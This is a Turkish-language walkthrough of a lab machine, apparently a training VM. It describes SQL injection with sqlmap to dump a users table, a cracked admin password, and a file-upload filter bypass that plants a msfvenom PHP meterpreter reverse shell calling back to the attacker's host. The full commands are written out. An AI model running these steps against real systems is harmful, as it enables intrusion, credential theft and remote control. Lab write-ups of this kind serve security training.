Herkese merhaba, rehberimize yeni bir labımızla devam edelim..

”netdiscover” komutu ile ip’mizi aldıktan sonra aklımıza ilk gelen şey Nmap ile port taraması yapmak oluyor:

80 portunun açık olduğunu görünce web tarayıcımıza ip adresini giriyoruz ve siteyle karşılaşıyoruz:a

Sitede çeşitli menüler var bunlarda gezinirken id değeri gözümüze çarpıyor ve adresin sonuna bir tırnak atarak SQL açığının olup olmadığını kontrol ediyoruz:

Bunu gördükten sonra siteye SQL Injection saldırısı yapmak için SqlMap programından yararlanıyoruz.Veritabanlarına erişmek için şu komutu kullanıyoruz.
“sqlmap -u 192.168.2.99/cat.php?id=1 –dbs”
“-u” ile Site adresini,
“–dbs” ile veritabanlarına erişmek istediğimizi belirtiyoruz.
Ve karşımızda veritabanları:

Gördüğümüz gibi burada bizim işimize yarayacak olan “photoblog” veritabanının içindeki tabloları çekmek için şu komutu giriyoruz:
“sqlmap -u 192.168.2.99/cat.php?id=1 -D photoblog –tables”
“-D” komutu ile hangi veritabanını seçeceğimizi,
“–tables” ile de tablolara erişmek istediğimizi belirtiyoruz.
Bu komut ile tablolar karşımıza geliyor:

Tablolara bakıyoruz resimler ve kategoriler bizi alakadar bile etmiyor,users tablosunu çekmek için can atıyoruz 🙂 Ve şu komutları kullanıyoruz:
“sqlmap -u 192.168.2.99/cat.php?id=1 -D photoblog -T users –dump”
“-T” ile erişmek istediğmiz tabloyu belirtiyoruz.
“–dump” ile de verileri çekiyoruz.

Bize bunu vermeden önce şifre kırılsın mı diye soruyor ama işimizi hızlı yapmak için hayır diyoruz,ve internetten bu şifreyi kırıyoruz:

Tamamdır şifreyi aldık,şimdi sitenin login kısmından giriş yapıyoruz:

Sitede gözümüze bir şey çarpıyor,fotoğraflar var ve altında upload etmek için bir kısım var,upload diyince aklımızdan şu geçiyor:

Shell üretirken metasploit framework’ten yararlanıyoruz ve şu kodları kullanarak shell üretiyoruz:
“msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.95 LPORT=4444 -f raw -o shell.php”
Bu kodları açıklar isek:”-p” ile payload’ımızı oluşturuyoruz,LHOST ksımına kendi IP’mizi ve LPORT ile Port numarasını giriyoruz(Bunlar sistemi dinlemeye alırken işimize yarayacak) Bu bir php payload’ı olduğu için “-f raw” diyoruz.En son da da adını ve uzantısını belirtiyoruz ve shell’imiz hazır!

Her şeyimiz hazır siteye upload ediyoruz ve sonuç:

Sol alttaki “NO PHP”


İlk önce siteni.php adlı dosyaların ilk satırına baktığını düşünüyoruz biraz oynamalar yapıyoruz sonuç yok,”MV” komutuyla jpg formatına dönüştürüyoruz gene bir sonuç yok.En son sitenin bize “.php” dediğini ama “.php3” demediği aklımıza geliyor 🙂 Ve “MV” komutu ile uzantısını değiştiriyoruz:
“mv shell.php shell.php3”

Bunu siteye upload ediyoruz.Tüm bunları yaptıktan sonra msfconsole komutunu yazarak yaptığımız shell’i dinlemeye almak için şu kodları giriyoruz:
“use exploit/multi/handler” =Bu komut shell’imizin ayarlarını tekrardan girip dinlememize olanak sağlıyor.
“set payload php/meterpreter/reverse_tcp” ile payload’ımızı seçiyoruz.
show options” ile payload’ımızın ayarlarını görüyoruz.
“set LHOST” ile kendi IP’mizi giriyoruz.
Son olarak “exploit” veya “run” komutu ile dinlemeye aıyoruz.

Şimdi sadece siteden shell “resmine” tıklamak kaldı ve tıkladığımız anda sisteme giriyoruz: